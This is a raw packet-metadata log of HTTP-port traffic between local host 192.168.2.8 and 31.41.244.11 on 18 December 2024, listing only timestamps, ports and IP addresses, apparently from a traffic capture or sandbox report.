Dec 18, 2024 13:38:35.717385054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.718553066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.718571901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.718621016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.719363928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.719410896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.719412088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.719451904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.719468117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.720433950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.720499992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.720552921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.721606016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.721618891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.721659899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.723052025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.723118067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.723167896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.723822117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.723864079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.723915100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.723959923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.724997997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.725044966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.725068092 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.725112915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.726007938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.726073980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.726120949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.726928949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.726974964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.726979017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.727035999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.728060961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.728106022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.728287935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.728353977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.728894949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.728939056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.728960991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.729003906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.729945898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.729991913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.730117083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.730160952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.731014967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.731163979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.731213093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.732074022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.732125044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.732204914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.732250929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.733151913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.733200073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.733305931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.733351946 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.734189987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.734297991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.734340906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.735289097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.735337019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.735399008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.735445023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.736305952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.736376047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.736435890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.736481905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.737356901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.737422943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.737457991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.737505913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.738425016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.738672972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.738732100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.739495039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.739568949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.739667892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.739716053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.740596056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.740647078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.740709066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.740753889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.741624117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.741683006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.741718054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.741764069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.742665052 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.742768049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.742818117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.743763924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.743819952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.743882895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.743953943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.744894028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.744940996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.745018005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.745062113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.745923996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.745944023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.745995045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.746922016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.746972084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.746984959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.747036934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.748090982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.748132944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.748137951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.748178005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.749047995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.749093056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.749128103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.749171972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.750101089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.750262022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.750338078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.751179934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.751239061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.751275063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.751319885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.752295017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.752351999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.752583027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.752628088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.753298044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.753344059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.753452063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.753499985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.754477024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.754578114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.754626036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.755570889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.755590916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.755619049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.755646944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.756597996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.756642103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.756695986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.757556915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.757616043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.769762039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.769984007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.770052910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.770309925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.770451069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.770529032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.770589113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.771159887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.771213055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.771214962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.771265030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.772109032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.772203922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.772264957 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.773224115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.773268938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.773307085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.773353100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.774224997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.774272919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.774401903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.774451971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.775424004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.775475025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.775569916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.775619030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.901384115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.901443958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.901519060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.901969910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.902020931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.902029037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.902070045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.903009892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.903059006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.903141975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.903181076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.904032946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.904079914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.904251099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.904294968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.905102968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.905153036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.905183077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.905222893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.906196117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.906255007 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.906330109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.906375885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.907269955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.907284021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.907320023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.908308983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.908488989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.908541918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.909291029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.909348011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.909462929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.909509897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.910409927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.910538912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.910584927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.911566019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.911617994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.911735058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.911780119 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.912679911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.912750006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.912760019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.912794113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.913558006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.913604021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.913681030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.913724899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.914840937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.914882898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.914901018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.914953947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.915760040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.915838957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.915884972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.916706085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.916750908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.916876078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.916918993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.917855024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.917895079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.917948961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.917990923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.918865919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.918909073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.919060946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.919133902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.919939041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.920079947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.920100927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.920125008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.920967102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.921022892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.921084881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.921127081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.922081947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.922152042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.922194004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.922238111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.923274994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.923289061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.923335075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.924159050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.924210072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.924293041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.924346924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.925272942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.925326109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.925353050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.925396919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.926270008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.926310062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.926384926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.926425934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.927339077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.927535057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.927556992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.927582026 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.928428888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.928504944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.928534985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.928579092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.929491043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.929651976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.929701090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.930643082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.930699110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.930757046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.930816889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.931602955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.931649923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.931751966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.931791067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.932630062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.932785034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.932833910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.933847904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.933891058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.933964968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.934010983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.934787035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.934834003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.935000896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.935045958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.935857058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.935935020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.935981989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.936945915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.937002897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.937006950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.937055111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.937987089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.938045025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.938059092 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.938101053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.938996077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.939054012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.939114094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.939162970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.940072060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.940138102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.940172911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.940223932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.941222906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.941271067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.941286087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.941317081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.942229033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.942398071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.942456961 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.943300962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.943373919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.943458080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.943509102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.944308043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.944382906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.944413900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.944459915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.945538998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.945586920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.945599079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.945631027 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.946443081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.946583986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.946713924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.947485924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.947556973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.947617054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.947669029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.948540926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.948605061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.948633909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.948708057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.949573040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.949635029 CET	49715	80	192.168.2.8	31.41.244.11
